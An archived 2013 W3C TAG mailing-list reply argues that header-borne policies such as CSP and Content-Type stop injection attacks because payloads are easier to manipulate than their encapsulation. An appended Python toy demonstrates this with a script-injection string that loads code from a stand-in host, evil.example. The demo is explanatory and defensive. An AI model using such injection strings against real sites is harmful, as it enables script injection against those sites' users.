- From: Bjoern Hoehrmann <derhoermi@gmx.net>
- Date: Fri, 01 Mar 2013 03:04:51 +0100
- To: Robin Berjon <robin@w3.org>
- Cc: "www-tag@w3.org List" <www-tag@w3.org>
* Robin Berjon wrote:
>I would support the TAG revisiting the topic of Authoritative Metadata,
>but with a view on pointing out that it is an architectural antipattern.
>Information that is essential and authoritative about the processing of
>a payload should be part of the payload and not external to it. Anything
>else is brittle and leads to breakage.

That may be desired. Content Security Policies for instance are meant to
"break" some code injection attacks against generated payloads. They are
essential and authoritative, and putting them into payloads would defeat
their purpose to a considerable extent as it's much easier to manipulate
payloads than it is to manipulate their encapsulation. `Content-Type` as
it is handled these days serves a similar purpose, you can use it to
ensure that certain payloads don't constitute an attack vector against
the sites you are running. The header makes stuff break. As it is meant
to.
-- 
Björn Höhrmann · mailto:bjoern@hoehrmann.de · http://bjoern.hoehrmann.de
Am Badedeich 7 · Telefon: +49(0)160/4415681 · http://www.bjoernsworld.de
25899 Dagebüll · PGP Pub. KeyID: 0xA4357E78 · http://www.websitedev.de/
Received on Friday, 1 March 2013 02:05:22 UTC
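The "encapsulation vs. payload" point above, as an added model that is not part of the original thread: a toy CSP evaluator where every delivered policy must allow a script, a header policy covers the whole document, and a `<meta>` policy covers only the content after it, so an injection that lands in the payload before the meta tag escapes a payload-borne policy but not a header-borne one. The template, origins and policy strings are constructed for the demo; the matcher handles only `'none'`, `'self'`, `*` and exact host sources.

```python
import re

META_CSP = re.compile(
    r"""<meta\s+http-equiv=["']Content-Security-Policy["']\s+content=["']([^"']*)["']""",
    re.IGNORECASE)

def script_src_allows(policy, origin, self_origin):
    """Whether one policy's script-src permits a script from `origin`.
    Toy matcher: understands 'none', 'self', '*' and exact host sources."""
    for directive in policy.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "script-src":
            continue
        sources = value.split()
        if "'none'" in sources:
            return False
        return ("*" in sources or origin in sources
                or ("'self'" in sources and origin == self_origin))
    return True  # no script-src directive: this policy does not restrict scripts

def script_allowed(headers, body, script_pos, origin, self_origin):
    """All delivered policies are enforced independently, so each of them
    must allow the script. A header policy covers the whole document; a
    meta policy only covers content after it, so a script injected earlier
    in the payload is not governed by it."""
    policies = []
    csp = headers.get("Content-Security-Policy")
    if csp:
        policies.append((csp, -1))  # header: precedes everything in the body
    for m in META_CSP.finditer(body):
        policies.append((m.group(1), m.start()))
    return all(script_src_allows(p, origin, self_origin)
               for p, pos in policies if pos < script_pos)

# Constructed sample: the <title> is filled from user data, and the CSP is
# carried in a meta tag that comes after that injection point.
TEMPLATE = ('<html><head><title>{title}</title>'
            '<meta http-equiv="Content-Security-Policy" content="script-src \'self\'">'
            '</head><body>...</body></html>')
INJECTED = '</title><script src="https://evil.example/x.js"></script><title>'

def demo(use_header):
    """Same manipulated payload; policy in the header or only in the payload."""
    body = TEMPLATE.replace("{title}", INJECTED)
    headers = {"Content-Security-Policy": "script-src 'self'"} if use_header else {}
    return script_allowed(headers, body, body.index("<script"),
                          "https://evil.example", "https://example.org")

if __name__ == "__main__":
    print("meta-only policy, injected script runs:", demo(False))  # True
    print("header policy, injected script runs:  ", demo(True))    # False
```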